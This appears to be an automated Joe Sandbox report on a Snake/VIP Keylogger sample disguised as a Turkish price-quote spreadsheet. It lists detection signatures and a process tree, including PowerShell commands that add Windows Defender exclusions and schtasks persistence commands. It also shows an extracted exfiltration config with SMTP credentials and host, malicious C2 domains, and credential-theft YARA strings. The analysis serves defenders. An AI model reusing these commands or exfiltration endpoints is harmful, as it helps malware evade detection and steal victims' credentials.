Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Overview

General Information

Sample name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
renamed because original name is a hash value
Original sample name:TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Analysis ID:1528049
MD5:2cc0d4388df2a7acfae0a9dc3cceb3b5
SHA1:63918ef85e4ee9d01edd4c0304e6f9682f90ee00
SHA256:c3bc0f624964efbdb410648c80ed1357b28f293ce0d0c7602fcae852e37ad918
Tags:exegeoMassLoggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)
    • powershell.exe (PID: 7680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8076 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7808 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • YzkHZRBcm.exe (PID: 8040 cmdline: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)
    • schtasks.exe (PID: 7208 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YzkHZRBcm.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe" MD5: 2CC0D4388DF2A7ACFAE0A9DC3CCEB3B5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            Click to see the 14 entries
            SourceRuleDescriptionAuthorStrings
            14.2.YzkHZRBcm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              14.2.YzkHZRBcm.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                14.2.YzkHZRBcm.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  14.2.YzkHZRBcm.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x3b2ae:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x3a951:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x3abae:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x3b58d:$a5: \Kometa\User Data\Default\Login Data
                  0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 23 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 7680, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 7680, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe, ParentImage: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe, ParentProcessId: 8040, ParentProcessName: YzkHZRBcm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp", ProcessId: 7208, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", ProcessId: 7808, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ProcessId: 7680, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ParentProcessId: 7464, ParentProcessName: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp", ProcessId: 7808, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T14:52:23.791314+020028033053Unknown Traffic192.168.2.749740188.114.96.3443TCP
                    2024-10-07T14:52:27.624268+020028033053Unknown Traffic192.168.2.749776188.114.96.3443TCP
                    2024-10-07T14:52:27.627534+020028033053Unknown Traffic192.168.2.749775188.114.96.3443TCP
                    2024-10-07T14:52:30.226508+020028033053Unknown Traffic192.168.2.749798188.114.96.3443TCP
                    2024-10-07T14:52:30.327723+020028033053Unknown Traffic192.168.2.749800188.114.96.3443TCP
                    2024-10-07T14:52:31.531374+020028033053Unknown Traffic192.168.2.749812188.114.96.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T14:52:22.045890+020028032742Potentially Bad Traffic192.168.2.749722132.226.247.7380TCP
                    2024-10-07T14:52:23.327263+020028032742Potentially Bad Traffic192.168.2.749722132.226.247.7380TCP
                    2024-10-07T14:52:24.606098+020028032742Potentially Bad Traffic192.168.2.749744132.226.247.7380TCP
                    2024-10-07T14:52:26.327433+020028032742Potentially Bad Traffic192.168.2.749758132.226.247.7380TCP
                    2024-10-07T14:52:27.061563+020028032742Potentially Bad Traffic192.168.2.749758132.226.247.7380TCP
                    2024-10-07T14:52:28.436531+020028032742Potentially Bad Traffic192.168.2.749783132.226.247.7380TCP
                    2024-10-07T14:52:29.764691+020028032742Potentially Bad Traffic192.168.2.749796132.226.247.7380TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Source: 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royallog@tonicables.top", "Password": "7213575aceACE@@ ", "Host": "mail.tonicables.top", "Port": "587", "Version": "4.4"}
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeReversingLabs: Detection: 52%
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeReversingLabs: Detection: 52%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeJoe Sandbox ML: detected
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49729 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49768 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49788 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49871 version: TLS 1.2
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: vamE.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
                    Source: Binary string: vamE.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, YzkHZRBcm.exe.0.dr
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 0133F8E9h9_2_0133F631
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 4x nop then jmp 0133FD41h9_2_0133FA88
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 012BF8E9h14_2_012BF631
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 012BFD41h14_2_012BFA88
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059264E0h14_2_059261E8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05925066h14_2_05924D98
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05923076h14_2_05922DA8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059210BEh14_2_05920DF0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05927800h14_2_05927508
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592EF88h14_2_0592EC90
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05922756h14_2_05922488
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592D7A0h14_2_0592D4A8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592079Eh14_2_059204D0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592A7D0h14_2_0592A4D8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592BFB8h14_2_0592BCC0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05928FE8h14_2_05928CF0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05924747h14_2_05924478
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592EAC0h14_2_0592E7C8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059222C6h14_2_05921FF8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592BAF0h14_2_0592B7F8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592D2D8h14_2_0592CFE0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059242B6h14_2_05923FE8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059219B7h14_2_05921710
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05928190h14_2_05927E98
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05929978h14_2_05929680
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059269A8h14_2_059266B0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05925986h14_2_059256B8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05923996h14_2_059236C8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592E130h14_2_0592DE38
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592F918h14_2_0592F620
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592C948h14_2_0592C650
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592B160h14_2_0592AE68
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592C480h14_2_0592C188
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059294B0h14_2_059291B8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592AC98h14_2_0592A9A0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05927CC8h14_2_059279D0
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05922BE6h14_2_05922918
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05924BD6h14_2_05924908
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592F450h14_2_0592F158
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592DC68h14_2_0592D970
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05920C2Eh14_2_05920960
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592A308h14_2_0592A010
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05928B20h14_2_05928828
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592030Eh14_2_05920040
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05927338h14_2_05927040
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592CE10h14_2_0592CB18
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592E5F8h14_2_0592E300
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592B628h14_2_0592B330
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05923E26h14_2_05923B58
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05925EB7h14_2_05925B48
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05929E40h14_2_05929B48
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05926E70h14_2_05926B78
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05928658h14_2_05928360
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05921E36h14_2_05921B68
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592154Eh14_2_05921280
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 0592FDE0h14_2_0592FAE8
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 05923506h14_2_05923238
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 4x nop then jmp 059254F6h14_2_05925228

                    Networking

                    barindex
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
